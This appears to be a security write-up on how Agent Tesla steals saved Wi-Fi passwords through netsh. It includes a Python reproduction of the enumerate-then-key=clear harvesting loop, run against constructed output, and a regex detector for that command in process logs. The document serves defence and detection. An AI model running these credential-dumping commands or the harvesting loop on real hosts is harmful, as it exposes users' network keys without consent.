Updated versions of Agent Tesla have recently been spotted in the wild that are now capable of stealing Wi-Fi passwords. No exploit is involved; the malware simply drives built-in Windows tooling. Issuing the command “netsh wlan show profile” lists the saved Wi-Fi profiles (one per network the machine has connected to and remembered; the profile name normally matches the SSID). From there, it issues a second command, “netsh wlan show profile name=NETWORK_NAME key=clear”, for each profile name to retrieve the stored key in plain text, provided the account netsh runs under is permitted to read that profile. Because legitimate users and administrators rarely need key=clear, that exact command line in process-creation logs is a practical detection hook.
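As an added example (not code from the original article and not Agent Tesla's own code), the following Python reproduces the two-step collection loop against constructed netsh output and pairs it with a detection over constructed process-creation events. The netsh transcripts, profile names, key value and log entries are all constructed; the output layout follows English-locale Windows, so the label regexes are an assumption that would need adjusting for localized builds.

```python
import re
from typing import Callable, Dict, List, Optional

# Label regexes for English-locale "netsh wlan show profile" output (assumption;
# localized Windows builds print translated labels).
PROFILE_RE = re.compile(r"^\s*(?:All User|Current User) Profile\s*:\s*(.+?)\s*$", re.M)
KEY_RE = re.compile(r"^\s*Key Content\s*:\s*(.+?)\s*$", re.M)


def parse_profile_names(listing: str) -> List[str]:
    """Profile names from step one, 'netsh wlan show profile'."""
    return PROFILE_RE.findall(listing)


def parse_key(detail: str) -> Optional[str]:
    """Plain-text key from step two; None for open networks or unreadable profiles."""
    m = KEY_RE.search(detail)
    return m.group(1) if m else None


def key_command(profile: str) -> List[str]:
    """argv for step two; subprocess quotes names containing spaces for us."""
    return ["netsh", "wlan", "show", "profile", f"name={profile}", "key=clear"]


def harvest_wifi_keys(run: Callable[[List[str]], str]) -> Dict[str, Optional[str]]:
    """The collection loop the article describes: enumerate, then query each
    profile with key=clear. `run` executes an argv list and returns stdout,
    so the same loop works against subprocess.run or the fake below."""
    names = parse_profile_names(run(["netsh", "wlan", "show", "profile"]))
    return {name: parse_key(run(key_command(name))) for name in names}


# Constructed netsh transcripts standing in for a real host.
LISTING = """
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : HomeNet
    All User Profile     : CoffeeShop
"""

DETAILS = {
    "HomeNet": """
Profile HomeNet on interface Wi-Fi:
Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : hunter2-constructed
""",
    # Open network: nothing is stored, so netsh prints no "Key Content" line.
    "CoffeeShop": """
Profile CoffeeShop on interface Wi-Fi:
Security settings
-----------------
    Authentication         : Open
    Cipher                 : None
    Security key           : Absent
""",
}


def fake_netsh(argv: List[str]) -> str:
    """Stand-in executor returning the constructed transcripts above."""
    if argv == ["netsh", "wlan", "show", "profile"]:
        return LISTING
    name = argv[4][len("name="):]
    return DETAILS.get(name, "There is no such wireless profile.")


# Detection side: flag the key=clear command line in process-creation logs.
NETSH_KEY_RE = re.compile(
    r"\bnetsh(?:\.exe)?\b.*\bwlan\b.*\bshow\b.*\bprofile\b.*\bkey\s*=\s*clear\b", re.I
)


def is_wifi_key_dump(command_line: str) -> bool:
    return bool(NETSH_KEY_RE.search(command_line))


def flag_wifi_key_dumps(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return process-creation events (Sysmon Event ID 1 / Security 4688 style
    dicts) whose command line dumps a Wi-Fi key. The parent image is kept so an
    analyst can triage: netsh spawned by an Office process or a binary under a
    user-writable directory is far more suspicious than from an admin shell."""
    return [e for e in events if is_wifi_key_dump(e.get("CommandLine", ""))]


# Constructed events; only the last two should be flagged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "netsh wlan show profile"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'netsh wlan show profile name="HomeNet" key=clear'},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\invoice.exe",
     "CommandLine": 'NETSH.EXE wlan show profile name="CoffeeShop" KEY=CLEAR'},
]

if __name__ == "__main__":
    print(harvest_wifi_keys(fake_netsh))
    for ev in flag_wifi_key_dumps(SAMPLE_EVENTS):
        print("ALERT", ev["ParentImage"], "->", ev["CommandLine"])
```

The collection loop is deliberately separated from process execution so it can be exercised offline; on a real host, `run` would be a thin wrapper around subprocess.run with capture_output=True. On the detection side, the regex matches on the command line alone, so an administrator running key=clear by hand is flagged too; the parent image in the returned event is what separates that from a stealer.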
Agent Tesla is a stealer that has been available since 2014. It is generally spread through phishing with malicious attachments of various types, such as .zip or .img files and Microsoft Office documents. It can gather system information, steal clipboard contents, log keystrokes, and more. Data exfiltration typically happens over email, using Simple Mail Transfer Protocol (SMTP) on port 587 to a host hardcoded in the binary, so an outbound port 587 connection from a process that is not a mail client is another point worth watching.